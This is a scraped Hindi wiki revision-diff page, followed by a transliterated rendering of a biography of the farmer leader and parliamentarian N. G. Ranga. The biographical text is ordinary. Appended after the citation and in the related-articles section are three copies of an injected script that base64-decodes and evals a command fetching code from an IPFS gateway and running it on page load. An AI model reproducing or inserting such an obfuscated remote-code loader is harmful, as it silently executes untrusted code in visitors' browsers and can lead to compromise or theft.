Difference between revisions of "एन.जी. रंगा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''एन.जी. रंगा''' एक प्रमुख कृषक नेता तथा सांसद थे। इनका कार्यक्षेत्र [[आन्ध्र प्रदेश]] था। ये आरम्भ से ही किसानों की समस्याओं से जुड़े रहे। इन्होंने किसानों के शोषण के विरूद्ध आवाज़ उठाई तथा उन्हें संगठित किया।  
+
'''एन.जी. रंगा''' ([[अंग्रेज़ी]]: ''N. G. Ranga'' ; जन्म- [[7 नवम्बर]], [[1900]], [[गुंटूर ज़िला]], [[आंध्र प्रदेश]]; मृत्यु- [[9 जून]], [[1995]]) [[भारत]] के स्वतंत्रता सेनानी, [[सांसद]] तथा प्रसिद्ध किसान नेता थे। ये आरम्भ से ही किसानों की समस्याओं से जुड़े रहे। इन्होंने किसानों के शोषण के विरूद्ध आवाज़ उठाई तथा उन्हें संगठित किया। एन.जी. रंगा उन चंद नेताओं में से एक थे, जिन्हें [[कृषि]] की समस्याओं का गहन ज्ञान था। साथ ही उन्होंने किसानों के भूमि अधिकार के लिए दो दशकों तक कार्य किया। उन्होंने [[कांग्रेस]] में कई महत्त्वपूर्ण पद प्राप्त किए, लेकिन सहकारी कृषि पर [[जवाहर लाल नेहरू|नेहरू जी]] के साथ विवाद होने के कारण उन्होंने त्यागपत्र दे दिया था। एन.जी. रंगा ने 'कृषिकर लोक पार्टी' के नाम से किसानों की एक पार्टी की स्थापना की थी, जिसका बाद में स्वतंत्र पार्टी में विलय हो गया, जिसके वे संस्थापक सदस्य और अध्यक्ष थे।
==जीवन परिचय==
+
==जन्म तथा शिक्षा==
प्रसिद्ध समाजवादी और कृषक नेता एन. जी. रंगा का जन्म आन्ध्र प्रदेश के [[गुंटूर ज़िला|गुंटूर ज़िले]] में [[7 नवम्बर]], [[1900]] ई. को हुआ था। बचपन में ही माता-पिता का निधन हो जाने के कारण विधवा चाची ने उनका पालन-पोषण किया। गुंटूर में स्नातक की शिक्षा पूरी करने के बाद वे आई. सी. एस. की परीक्षा देने के उद्देश्य से 1920 में [[इंग्लैण्ड]] गए। परन्तु ऑक्सफ़ोर्ड विश्वविद्यालय में जी. डी. एच. कोल, ब्रेल्सफ़ोर्ड, रेडफ़ोर्ड जैसे समाजवादी विचारकों के प्रभाव में आकर रंगा ने अपने विचार बदल लिए और उन्होंने साहित्य की डिग्री ली। रंगा के ऊपर [[विपिन चन्द्र पाल]] तथा अन्य क्रान्तिकारियों के साथ-साथ प्राचीन भारतीय साहित्य, [[रामायण]], [[महाभारत]] का भी प्रभाव पड़ा। [[भारत]] लौटने पर उन्होंने मद्रास के कॉलेज में अध्यापन का कार्य आरम्भ किया। किन्तु शीघ्र ही उसे छोड़कर स्वतंत्रता संग्राम में और किसानों को संगठित करने के काम में जुट गए। वे अखिल भारतीय कांग्रेस कमेटी के सदस्य और आन्ध्र प्रदेश कांग्रेस कमेटी के अध्यक्ष बने।  
+
प्रसिद्ध समाजवादी और कृषक नेता एन.जी. रंगा का जन्म [[आन्ध्र प्रदेश]] के [[गुंटूर ज़िला|गुंटूर ज़िले]] में [[7 नवम्बर]], [[1900]] ई. को हुआ था। इनके बचपन में ही [[माता]]-[[पिता]] का निधन हो गया था। इनकी विधवा चाची ने उनका पालन-पोषण किया। गुंटूर में स्नातक की शिक्षा पूरी करने के बाद एन.जी. रंगा 'आई. सी. एस.' की परीक्षा देने के उद्देश्य से [[1920]] में [[इंग्लैण्ड]] गए, परन्तु 'ऑक्सफ़ोर्ड विश्वविद्यालय' में जी. डी. एच. कोल, ब्रेल्सफ़ोर्ड, रेडफ़ोर्ड जैसे समाजवादी विचारकों के प्रभाव में आकर रंगा ने अपने विचार बदल लिए और उन्होंने [[साहित्य]] की डिग्री ली।
==राजनीति में==
+
====व्यावसायिक शुरुआत====
वे कृषि उत्पादकों के अंतर्राष्ट्रीय सम्मेलन के संस्थापक सदस्य थे। स्वतंत्रता संग्राम में भाग लेने के कारण उन्हें कई बार जेल की सज़ाएँ भी भोगनी पड़ीं। उन्होंने 1927 से 1930 तक मद्रास विश्वविद्यालय में और 1980 में आन्ध्र विश्वविद्यालय में अध्यापन का काम किया था। इससे वे प्रोफ़ेसर रंगा कहलाते थे। [[सी. राजगोपालाचारी|राजगोपालाचारी]] के साथ 1959 में रंगा ‘स्वतंत्र पार्टी’ में सम्मिलित हुए और उसके अध्यक्ष बने। वे [[लोकसभा]] के अध्यक्ष चुने गए और वहाँ अपने दल के नेता रहे। 1973 में उन्होंने ‘स्वतंत्र पार्टी’ छोड़ दी और फिर से कांग्रेस में आ गए। समाज सुधार के क्षेत्र में भी वे अग्रणी रहे। 1923 में उन्होंने अपने घर का कुआँ हरिजनों के लिए खोल दिया। महिलाओं को आगे बढ़ाने का सदा समर्थन करते रहे। आन्ध्र प्रदेश को अलग राज्य बनाने के आन्दोलन के भी वे प्रमुख नेता थे।
+
एन.जी. रंगा जी के ऊपर [[विपिन चन्द्र पाल]] तथा अन्य क्रान्तिकारियों के साथ-साथ प्राचीन भारतीय साहित्य, [[रामायण]], [[महाभारत]] का भी प्रभाव पड़ा। [[भारत]] लौटने पर उन्होंने [[मद्रास]] के कॉलेज में अध्यापन का कार्य आरम्भ किया।
 +
==राजनीति में प्रवेश==
 +
शीघ्र ही रंगा जी ने अध्यापन कार्य छोड़ दिया और [[स्वतंत्रता संग्राम]] में कूद पड़े। वे किसानों को संगठित करने के काम में जुट गए। बाद में वे 'अखिल भारतीय कांग्रेस कमेटी' के सदस्य और 'आन्ध्र प्रदेश कांग्रेस कमेटी' के अध्यक्ष बने। एन.जी. रंगा [[कृषि]] उत्पादकों के अंतर्राष्ट्रीय सम्मेलन के संस्थापक सदस्य थे। स्वतंत्रता संग्राम में भाग लेने के कारण उन्हें कई बार जेल की सज़ाएँ भी भोगनी पड़ीं। उन्होंने [[1927]] से [[1930]] तक [[मद्रास विश्वविद्यालय]] में और [[1980]] में आन्ध्र विश्वविद्यालय में अध्यापन का काम किया था। इससे वे 'प्रोफ़ेसर रंगा' कहलाते थे। [[सी. राजगोपालाचारी|राजगोपालाचारी]] के साथ [[1959]] में रंगा ‘स्वतंत्र पार्टी’ में सम्मिलित हुए और उसके अध्यक्ष बने। वे [[लोकसभा]] के अध्यक्ष चुने गए और वहाँ अपने दल के नेता रहे। [[1973]] में उन्होंने ‘स्वतंत्र पार्टी’ छोड़ दी और फिर से [[कांग्रेस]] में आ गए।
 +
====समाज सुधार====
 +
समाज सुधार के क्षेत्र में भी एन.जी. रंगा अग्रणी रहे। [[1923]] में उन्होंने अपने घर का [[कुआँ]] हरिजनों के लिए खोल दिया। महिलाओं को आगे बढ़ाने का सदा समर्थन करते रहे। [[आन्ध्र प्रदेश]] को अलग राज्य बनाने के आन्दोलन के भी वे प्रमुख नेता थे।
 
====विशेष बिन्दु====
 
====विशेष बिन्दु====
*इन्होंने 1931 ई. में आन्ध्र प्रदेश रैयत सभा की स्थापना की।  
+
*एन.जी. रंगा ने [[1931]] ई. में आन्ध्र प्रदेश रैयत सभा की स्थापना की।
*ये कांग्रेस समाजवादी पार्टी से उसकी स्थापना के साथ ही जुड़ गए।
+
*वे कांग्रेस समाजवादी पार्टी से उसकी स्थापना के साथ ही जुड़ गए थे।
*इन्होंने आन्ध्र प्रदेश के नीदुब्रोलु कस्बे में ‘इण्डियन पेजेण्ट इन्स्टीट्यूट’ की स्थापना की, जिसका मुख्य उद्देश्य किसान कार्यकलापों को प्रशिक्षण देना था।  
+
*इन्होंने [[आन्ध्र प्रदेश]] के नीदुब्रोलु कस्बे में ‘इण्डियन पेजेण्ट इन्स्टीट्यूट’ की स्थापना की, जिसका मुख्य उद्देश्य किसान कार्यकलापों को प्रशिक्षण देना था।
*स्वतन्त्रता प्राप्ति के पश्चात वे [[लोकसभा]] के सदस्य बने तथा लगातार आठ बार लोकसभा के लिए चुने गए, जो कीर्तिमान है।  
+
*स्वतन्त्रता प्राप्ति के पश्चात वे [[लोक सभा]] के सदस्य बने तथा लगातार आठ बार लोक सभा के लिए चुने गए, जो कीर्तिमान है।
 
 
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 15: Line 18:
 
{{cite book | last =नागोरी | first = डॉ. एस.एल. | title =स्वतंत्रता सेनानी कोश (गाँधीयुगीन) | edition = 2011 | publisher = गीतांजलि प्रकाशन, जयपुर | location = भारतडिस्कवरी पुस्तकालय | language = [[हिन्दी]] | pages = पृष्ठ सं 84 | chapter = खण्ड 3 }}
 
{{cite book | last =नागोरी | first = डॉ. एस.एल. | title =स्वतंत्रता सेनानी कोश (गाँधीयुगीन) | edition = 2011 | publisher = गीतांजलि प्रकाशन, जयपुर | location = भारतडिस्कवरी पुस्तकालय | language = [[हिन्दी]] | pages = पृष्ठ सं 84 | chapter = खण्ड 3 }}
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{स्वतन्त्रता सेनानी}}{{पद्म विभूषण}}
 
{{स्वतन्त्रता सेनानी}}{{पद्म विभूषण}}
[[Category:पद्म विभूषण]]
+
[[Category:स्वतन्त्रता सेनानी]][[Category:लोकसभा सांसद]][[Category:पद्म विभूषण]][[Category:जीवनी साहित्य]][[Category:समाज सुधारक]][[Category:लेखक]][[Category:चरित कोश]]
[[Category:स्वतन्त्रता_सेनानी]][[Category:समाज सुधारक]][[Category:लेखक]]
 
[[Category:चरित कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 12:44, 30 October 2014

en.ji. ranga (aangrezi: N. G. Ranga ; janm- 7 navambar, 1900, guantoor zila, aandhr pradesh; mrityu- 9 joon, 1995) bharat ke svatantrata senani, saansad tatha prasiddh kisan neta the. ye arambh se hi kisanoan ki samasyaoan se ju de rahe. inhoanne kisanoan ke shoshan ke virooddh avaz uthaee tatha unhean sangathit kiya. en.ji. ranga un chand netaoan mean se ek the, jinhean krishi ki samasyaoan ka gahan jnan tha. sath hi unhoanne kisanoan ke bhoomi adhikar ke lie do dashakoan tak kary kiya. unhoanne kaangres mean kee mahattvapoorn pad prapt kie, lekin sahakari krishi par neharoo ji ke sath vivad hone ke karan unhoanne tyagapatr de diya tha. en.ji. ranga ne 'krishikar lok parti' ke nam se kisanoan ki ek parti ki sthapana ki thi, jisaka bad mean svatantr parti mean vilay ho gaya, jisake ve sansthapak sadasy aur adhyaksh the.

janm tatha shiksha

prasiddh samajavadi aur krishak neta en.ji. ranga ka janm andhr pradesh ke guantoor zile mean 7 navambar, 1900 ee. ko hua tha. inake bachapan mean hi mata-pita ka nidhan ho gaya tha. inaki vidhava chachi ne unaka palan-poshan kiya. guantoor mean snatak ki shiksha poori karane ke bad en.ji. ranga 'aee. si. es.' ki pariksha dene ke uddeshy se 1920 mean ianglaind ge, parantu 'aauksaford vishvavidyalay' mean ji. di. ech. kol, brelsaford, redaford jaise samajavadi vicharakoan ke prabhav mean akar ranga ne apane vichar badal lie aur unhoanne sahity ki digri li.

vyavasayik shuruat

en.ji. ranga ji ke oopar vipin chandr pal tatha any krantikariyoan ke sath-sath prachin bharatiy sahity, ramayan, mahabharat ka bhi prabhav p da. bharat lautane par unhoanne madras ke k aaulej mean adhyapan ka kary arambh kiya.

rajaniti mean pravesh

shighr hi ranga ji ne adhyapan kary chho d diya aur svatantrata sangram mean kood p de. ve kisanoan ko sangathit karane ke kam mean jut ge. bad mean ve 'akhil bharatiy kaangres kameti' ke sadasy aur 'andhr pradesh kaangres kameti' ke adhyaksh bane. en.ji. ranga krishi utpadakoan ke aantarrashtriy sammelan ke sansthapak sadasy the. svatantrata sangram mean bhag lene ke karan unhean kee bar jel ki sazaean bhi bhogani p dian. unhoanne 1927 se 1930 tak madras vishvavidyalay mean aur 1980 mean andhr vishvavidyalay mean adhyapan ka kam kiya tha. isase ve 'profesar ranga' kahalate the. rajagopalachari ke sath 1959 mean ranga ‘svatantr parti’ mean sammilit hue aur usake adhyaksh bane. ve lokasabha ke adhyaksh chune ge aur vahaan apane dal ke neta rahe. 1973 mean unhoanne ‘svatantr parti’ chho d di aur phir se kaangres mean a ge.

samaj sudhar

samaj sudhar ke kshetr mean bhi en.ji. ranga agrani rahe. 1923 mean unhoanne apane ghar ka kuaan harijanoan ke lie khol diya. mahilaoan ko age badhane ka sada samarthan karate rahe. andhr pradesh ko alag rajy banane ke andolan ke bhi ve pramukh neta the.

vishesh bindu

  • en.ji. ranga ne 1931 ee. mean andhr pradesh raiyat sabha ki sthapana ki.
  • ve kaangres samajavadi parti se usaki sthapana ke sath hi ju d ge the.
  • inhoanne andhr pradesh ke nidubrolu kasbe mean ‘indiyan pejent instityoot’ ki sthapana ki, jisaka mukhy uddeshy kisan karyakalapoan ko prashikshan dena tha.
  • svatantrata prapti ke pashchat ve lok sabha ke sadasy bane tatha lagatar ath bar lok sabha ke lie chune ge, jo kirtiman hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

nagori, d aau. es.el. “khand 3”, svatantrata senani kosh (gaandhiyugin), 2011 (hindi), bharatadiskavari pustakalay: gitaanjali prakashan, jayapur, prishth san 84.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>